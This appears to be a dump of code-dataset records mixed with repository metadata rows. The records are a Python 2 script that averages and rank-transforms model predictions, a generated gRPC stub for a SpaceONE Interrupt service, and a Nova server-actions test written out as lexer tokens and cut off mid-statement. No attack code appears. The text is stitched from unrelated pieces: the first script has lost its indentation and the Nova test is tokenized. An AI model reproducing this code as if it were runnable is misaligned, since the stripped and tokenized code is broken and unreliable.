'data/output/temp/v2_stage1_ver3_all_fold.csv',
'data/output/temp/v3_stage1_ver3_all_fold.csv',
'data/output/temp/v4_stage1_ver3_all_fold.csv',
'data/output/temp/v5_stage1_ver3_all_fold.csv',
'data/output/temp/v6_stage1_ver3_all_fold.csv',
'data/output/temp/v7_stage1_ver3_all_fold.csv',
'data/output/temp/v8_stage1_ver3_all_fold.csv',
'data/output/temp/v9_stage1_ver3_all_fold.csv',
'data/output/temp/v10_stage1_ver3_all_fold.csv',
'data/output/temp/v11_stage1_ver3_all_fold.csv',
'data/output/temp/v12_stage1_ver3_all_fold.csv',
'data/output/temp/v13_stage1_ver3_all_fold.csv',
'data/output/temp/v14_stage1_ver3_all_fold.csv',
'data/output/temp/v15_stage1_ver3_all_fold.csv',
'data/output/temp/v16_stage1_ver3_all_fold.csv',
'data/output/temp/v17_stage1_ver3_all_fold.csv',
'data/output/temp/v18_stage1_ver3_all_fold.csv',
'data/output/temp/v19_stage1_ver3_all_fold.csv',
'data/output/temp/v20_stage1_ver3_all_fold.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
#x['TARGET'] = (a.rank().mean(1))/a.shape[0]
# just averaging
x['TARGET'] = a.mean(1)
x = pd.concat([targetID, x[['TARGET']]], axis=1)
x.to_csv('data/output/temp/train_NN_ikkiver3_variantA.csv', index=None)
#pubLB:
print 'Done averaging'
print 'rank transformation with train and test'
#rank trafo with train and test
tr = pd.read_csv('data/output/temp/train_NN_ikkiver3_variantA.csv')
te = pd.read_csv('data/output/temp/test_NN_ikkiver3_variantA.csv')
tr_te = pd.concat([tr, te])
tr_te['TARGET'] = tr_te['TARGET'].rank()
# scale [0,1]
tr_te['TARGET'] = (tr_te['TARGET'] - tr_te['TARGET'].min()) / (tr_te['TARGET'].max() - tr_te['TARGET'].min())
tr = tr_te.iloc[:len(tr),:]
te = tr_te.iloc[len(tr):,:]
tr.to_csv('data/output/temp/train_NN_ikki_ver3.csv', index=False)
te.to_csv('data/output/temp/test_NN_ikki_ver3.csv', index=False)
print 'Done rank transformation'
print 'CV of each model per fold and averaging'
# CV of each model and averaging
from sklearn.metrics import roc_auc_score as AUC
a = pd.DataFrame()
set_idnex = 1
set_data = pd.read_csv('data/input/5fold_20times.csv')
y = train.TARGET
for i in ['data/output/temp/v1_stage1_ver3_all_fold.csv',
'data/output/temp/v2_stage1_ver3_all_fold.csv',
'data/output/temp/v3_stage1_ver3_all_fold.csv',
'data/output/temp/v4_stage1_ver3_all_fold.csv',
'data/output/temp/v5_stage1_ver3_all_fold.csv',
'data/output/temp/v6_stage1_ver3_all_fold.csv',
'data/output/temp/v7_stage1_ver3_all_fold.csv',
'data/output/temp/v8_stage1_ver3_all_fold.csv',
'data/output/temp/v9_stage1_ver3_all_fold.csv',
'data/output/temp/v10_stage1_ver3_all_fold.csv',
'data/output/temp/v11_stage1_ver3_all_fold.csv',
'data/output/temp/v12_stage1_ver3_all_fold.csv',
'data/output/temp/v13_stage1_ver3_all_fold.csv',
'data/output/temp/v14_stage1_ver3_all_fold.csv',
'data/output/temp/v15_stage1_ver3_all_fold.csv',
'data/output/temp/v16_stage1_ver3_all_fold.csv',
'data/output/temp/v17_stage1_ver3_all_fold.csv',
'data/output/temp/v18_stage1_ver3_all_fold.csv',
'data/output/temp/v19_stage1_ver3_all_fold.csv',
'data/output/temp/v20_stage1_ver3_all_fold.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
cv_index = {}
set_name = 'set{}'.format(set_idnex)
for i in xrange(5):
train_cv = set_data.loc[(set_data[set_name]!=i).values, set_name].index
test_cv = set_data.loc[(set_data[set_name]==i).values, set_name].index
cv_index[i] = {}
cv_index[i]['train'] = train_cv.values
cv_index[i]['test'] = test_cv.values
skf = pd.DataFrame(cv_index).stack().T
auc = []
for i in xrange(5):
#print AUC(y.ix[skf['test'][i]].values, x.ix[skf['test'][i]].values)
auc.append(AUC(y.ix[skf['test'][i]].values, x.ix[skf['test'][i]].values))
set_idnex += 1
print 'Per model, mean: {} std: {}'.format(np.mean(auc), np.std(auc))
print 'Averaging AUC:{}'.format(AUC(y.values,a.mean(1).values))
#AUC:
| 38.160714 | 113 | 0.565724 | 5,502 | 44,877 | 4.412577 | 0.06016 | 0.108081 | 0.058077 | 0.061949 | 0.885575 | 0.874495 | 0.869306 | 0.838372 | 0.799942 | 0.792858 | 0 | 0.053319 | 0.292043 | 44,877 | 1,175 | 114 | 38.193191 | 0.710837 | 0.024601 | 0 | 0.724417 | 0 | 0 | 0.186879 | 0.071621 | 0 | 0 | 0 | 0 | 0.001013 | 0 | null | null | 0 | 0.014184 | null | null | 0.008105 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
477b253dd16e8728cea153498c36566e44619888 | 6,429 | py | Python | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from spaceone.api.spot_automation.plugin import interrupt_pb2 as spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2
class InterruptStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.setup = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/setup',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.confirm = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/confirm',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.handle = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/handle',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.FromString,
)
class InterruptServicer(object):
"""Missing associated documentation comment in .proto file."""
def setup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def confirm(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def handle(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InterruptServicer_to_server(servicer, server):
rpc_method_handlers = {
'setup': grpc.unary_unary_rpc_method_handler(
servicer.setup,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'confirm': grpc.unary_unary_rpc_method_handler(
servicer.confirm,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'handle': grpc.unary_unary_rpc_method_handler(
servicer.handle,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.FromString,
response_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'spaceone.api.spot_automation.plugin.Interrupt', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Interrupt(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def setup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/setup',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def confirm(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/confirm',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def handle(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/handle',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.SerializeToString,
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 47.977612 | 145 | 0.704153 | 665 | 6,429 | 6.37594 | 0.15188 | 0.06934 | 0.042925 | 0.052123 | 0.850236 | 0.842925 | 0.826887 | 0.791509 | 0.778774 | 0.711557 | 0 | 0.004424 | 0.226474 | 6,429 | 133 | 146 | 48.338346 | 0.84818 | 0.088972 | 0 | 0.524272 | 1 | 0 | 0.089637 | 0.062694 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07767 | false | 0 | 0.029126 | 0.029126 | 0.165049 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4787b37899749d3edce8026358ec264b130f162a | 102,091 | py | Python | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright 2011 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'uuid'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'mox3'
name|'import'
name|'mox'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'uuidutils'
newline|'\n'
name|'import'
name|'webob'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'extension_info'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'servers'
name|'as'
name|'servers_v21'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'api'
name|'as'
name|'compute_api'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'task_states'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'vm_states'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'image'
name|'import'
name|'glance'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'api'
op|'.'
name|'openstack'
name|'import'
name|'fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_block_device'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
name|'import'
name|'fake'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
DECL|variable|FAKE_UUID
name|'FAKE_UUID'
op|'='
name|'fakes'
op|'.'
name|'FAKE_UUID'
newline|'\n'
DECL|variable|INSTANCE_IDS
name|'INSTANCE_IDS'
op|'='
op|'{'
name|'FAKE_UUID'
op|':'
number|'1'
op|'}'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|return_server_not_found
name|'def'
name|'return_server_not_found'
op|'('
op|'*'
name|'arg'
op|','
op|'**'
name|'kwarg'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotFound'
op|'('
name|'instance_id'
op|'='
name|'FAKE_UUID'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|instance_update_and_get_original
dedent|''
name|'def'
name|'instance_update_and_get_original'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
name|'values'
op|','
nl|'\n'
name|'columns_to_join'
op|'='
name|'None'
op|','
nl|'\n'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'INSTANCE_IDS'
op|'['
name|'instance_uuid'
op|']'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'inst'
op|'='
name|'dict'
op|'('
name|'inst'
op|','
op|'**'
name|'values'
op|')'
newline|'\n'
name|'return'
op|'('
name|'inst'
op|','
name|'inst'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|instance_update
dedent|''
name|'def'
name|'instance_update'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'inst'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'INSTANCE_IDS'
op|'['
name|'instance_uuid'
op|']'
op|','
name|'host'
op|'='
string|"'fake_host'"
op|')'
newline|'\n'
name|'return'
name|'inst'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|MockSetAdminPassword
dedent|''
name|'class'
name|'MockSetAdminPassword'
op|'('
name|'object'
op|')'
op|':'
newline|'\n'
DECL|member|__init__
indent|' '
name|'def'
name|'__init__'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_id'
op|'='
name|'None'
newline|'\n'
name|'self'
op|'.'
name|'password'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|__call__
dedent|''
name|'def'
name|'__call__'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'password'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'instance_id'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'password'
op|'='
name|'password'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerActionsControllerTestV21
dedent|''
dedent|''
name|'class'
name|'ServerActionsControllerTestV21'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|variable|image_uuid
indent|' '
name|'image_uuid'
op|'='
string|"'76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'"
newline|'\n'
DECL|variable|image_base_url
name|'image_base_url'
op|'='
string|"'http://localhost:9292/images/'"
newline|'\n'
DECL|variable|image_href
name|'image_href'
op|'='
name|'image_base_url'
op|'+'
string|"'/'"
op|'+'
name|'image_uuid'
newline|'\n'
DECL|variable|servers
name|'servers'
op|'='
name|'servers_v21'
newline|'\n'
DECL|variable|validation_error
name|'validation_error'
op|'='
name|'exception'
op|'.'
name|'ValidationError'
newline|'\n'
DECL|variable|request_too_large_error
name|'request_too_large_error'
op|'='
name|'exception'
op|'.'
name|'ValidationError'
newline|'\n'
DECL|variable|image_url
name|'image_url'
op|'='
name|'None'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ServerActionsControllerTestV21'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'group'
op|'='
string|"'glance'"
op|','
name|'api_servers'
op|'='
op|'['
string|"'http://localhost:9292'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
nl|'\n'
name|'fakes'
op|'.'
name|'fake_instance_get'
op|'('
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake_host'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_update_and_get_original'"
op|','
nl|'\n'
name|'instance_update_and_get_original'
op|')'
newline|'\n'
nl|'\n'
name|'fakes'
op|'.'
name|'stub_out_nw_api'
op|'('
name|'self'
op|')'
newline|'\n'
name|'fakes'
op|'.'
name|'stub_out_compute_api_snapshot'
op|'('
name|'self'
op|'.'
name|'stubs'
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'stub_out_image_service'
op|'('
name|'self'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'allow_instance_snapshots'
op|'='
name|'True'
op|','
nl|'\n'
name|'enable_instance_password'
op|'='
name|'True'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_image_href'
op|'='
string|"'155d900f-4e14-4e4c-a73d-069cbf4541e6'"
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'='
name|'self'
op|'.'
name|'_get_controller'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'compute_api'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'compute_api'
newline|'\n'
name|'self'
op|'.'
name|'req'
op|'='
name|'fakes'
op|'.'
name|'HTTPRequest'
op|'.'
name|'blank'
op|'('
string|"''"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'context'
op|'='
name|'self'
op|'.'
name|'req'
op|'.'
name|'environ'
op|'['
string|"'nova.context'"
op|']'
newline|'\n'
nl|'\n'
DECL|member|_get_controller
dedent|''
name|'def'
name|'_get_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ext_info'
op|'='
name|'extension_info'
op|'.'
name|'LoadedExtensionInfo'
op|'('
op|')'
newline|'\n'
name|'return'
name|'self'
op|'.'
name|'servers'
op|'.'
name|'ServersController'
op|'('
name|'extension_info'
op|'='
name|'ext_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_set_fake_extension
dedent|''
name|'def'
name|'_set_fake_extension'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'pass'
newline|'\n'
nl|'\n'
DECL|member|_rebuild
dedent|''
name|'def'
name|'_rebuild'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'image_ref'
op|','
name|'value'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'value'
name|'is'
name|'not'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'rebuild'
op|'('
name|'context'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'image_ref'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'preserve_ephemeral'
op|'='
name|'value'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'rebuild'
op|'('
name|'context'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'image_ref'
op|','
nl|'\n'
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_stub_instance_get
dedent|''
dedent|''
name|'def'
name|'_stub_instance_get'
op|'('
name|'self'
op|','
name|'uuid'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|')'
newline|'\n'
name|'if'
name|'uuid'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'uuid'
op|'='
name|'uuidutils'
op|'.'
name|'generate_uuid'
op|'('
op|')'
newline|'\n'
dedent|''
name|'instance'
op|'='
name|'fake_instance'
op|'.'
name|'fake_db_instance'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'uuid'
op|'='
name|'uuid'
op|','
name|'vm_state'
op|'='
name|'vm_states'
op|'.'
name|'ACTIVE'
op|','
name|'task_state'
op|'='
name|'None'
op|')'
newline|'\n'
name|'instance'
op|'='
name|'objects'
op|'.'
name|'Instance'
op|'.'
name|'_from_db_object'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'context'
op|','
name|'objects'
op|'.'
name|'Instance'
op|'('
op|')'
op|','
name|'instance'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'compute_api'
op|'.'
name|'get'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'uuid'
op|','
nl|'\n'
name|'expected_attrs'
op|'='
op|'['
string|"'flavor'"
op|','
string|"'pci_devices'"
op|','
nl|'\n'
string|"'numa_topology'"
op|']'
op|','
nl|'\n'
name|'want_objects'
op|'='
name|'True'
op|')'
op|'.'
name|'AndReturn'
op|'('
name|'instance'
op|')'
newline|'\n'
name|'return'
name|'instance'
newline|'\n'
nl|'\n'
DECL|member|_test_locked_instance
dedent|''
name|'def'
name|'_test_locked_instance'
op|'('
name|'self'
op|','
name|'action'
op|','
name|'method'
op|'='
name|'None'
op|','
name|'body_map'
op|'='
name|'None'
op|','
nl|'\n'
name|'compute_api_args_map'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'body_map'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'body_map'
op|'='
op|'{'
op|'}'
newline|'\n'
dedent|''
name|'if'
name|'compute_api_args_map'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'compute_api_args_map'
op|'='
op|'{'
op|'}'
newline|'\n'
nl|'\n'
dedent|''
name|'instance'
op|'='
name|'self'
op|'.'
name|'_stub_instance_get'
op|'('
op|')'
newline|'\n'
name|'args'
op|','
name|'kwargs'
op|'='
name|'compute_api_args_map'
op|'.'
name|'get'
op|'('
name|'action'
op|','
op|'('
op|'('
op|')'
op|','
op|'{'
op|'}'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'getattr'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
name|'method'
op|')'
op|'('
name|'self'
op|'.'
name|'context'
op|','
name|'instance'
op|','
nl|'\n'
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|'.'
name|'AndRaise'
op|'('
nl|'\n'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'controller_function'
op|'='
string|"'self.controller.'"
op|'+'
name|'action'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'eval'
op|'('
name|'controller_function'
op|')'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|','
nl|'\n'
name|'body'
op|'='
name|'body_map'
op|'.'
name|'get'
op|'('
name|'action'
op|')'
op|')'
newline|'\n'
comment|'# Do these here instead of tearDown because this method is called'
nl|'\n'
comment|'# more than once for the same test case'
nl|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'VerifyAll'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'UnsetStubs'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_actions_with_locked_instance
dedent|''
name|'def'
name|'test_actions_with_locked_instance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'actions'
op|'='
op|'['
string|"'_action_resize'"
op|','
string|"'_action_confirm_resize'"
op|','
nl|'\n'
string|"'_action_revert_resize'"
op|','
string|"'_action_reboot'"
op|','
nl|'\n'
string|"'_action_rebuild'"
op|']'
newline|'\n'
nl|'\n'
name|'method_translations'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
string|"'resize'"
op|','
nl|'\n'
string|"'_action_confirm_resize'"
op|':'
string|"'confirm_resize'"
op|','
nl|'\n'
string|"'_action_revert_resize'"
op|':'
string|"'revert_resize'"
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
string|"'reboot'"
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
string|"'rebuild'"
op|'}'
newline|'\n'
nl|'\n'
name|'body_map'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
op|'{'
string|"'resize'"
op|':'
op|'{'
string|"'flavorRef'"
op|':'
string|"'2'"
op|'}'
op|'}'
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
op|'{'
string|"'reboot'"
op|':'
op|'{'
string|"'type'"
op|':'
string|"'HARD'"
op|'}'
op|'}'
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
op|'{'
string|"'rebuild'"
op|':'
op|'{'
nl|'\n'
string|"'imageRef'"
op|':'
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
string|"'adminPass'"
op|':'
string|"'TNc53Dr8s7vw'"
op|'}'
op|'}'
op|'}'
newline|'\n'
nl|'\n'
name|'args_map'
op|'='
op|'{'
string|"'_action_resize'"
op|':'
op|'('
op|'('
string|"'2'"
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_confirm_resize'"
op|':'
op|'('
op|'('
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_reboot'"
op|':'
op|'('
op|'('
string|"'HARD'"
op|','
op|')'
op|','
op|'{'
op|'}'
op|')'
op|','
nl|'\n'
string|"'_action_rebuild'"
op|':'
op|'('
op|'('
name|'self'
op|'.'
name|'image_uuid'
op|','
nl|'\n'
string|"'TNc53Dr8s7vw'"
op|')'
op|','
op|'{'
op|'}'
op|')'
op|'}'
newline|'\n'
nl|'\n'
name|'for'
name|'action'
name|'in'
name|'actions'
op|':'
newline|'\n'
indent|' '
name|'method'
op|'='
name|'method_translations'
op|'.'
name|'get'
op|'('
name|'action'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
